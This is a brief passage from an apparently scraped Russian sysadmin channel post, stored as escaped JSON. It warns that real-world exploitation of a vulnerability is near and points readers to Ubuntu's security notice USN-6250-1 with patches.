\u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445 - \u0440\u0443\u043a\u043e\u0439 \u043f\u043e\u0434\u0430\u0442\u044c. \n\nUbuntu \u0443\u0436\u0435 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u043f\u0430\u0442\u0447\u0438: https://ubuntu.com/security/notices/USN-6250-1\n\n\u0422\u0438\u043f\u0438\u0447\u043d\u044b\u0439 \ud83e\udd78 \u0421\u0438\u0441\u0430\u0434\u043c\u0438\u043d", "creation_timestamp": "2023-07-27T15:32:19.000000Z"}]}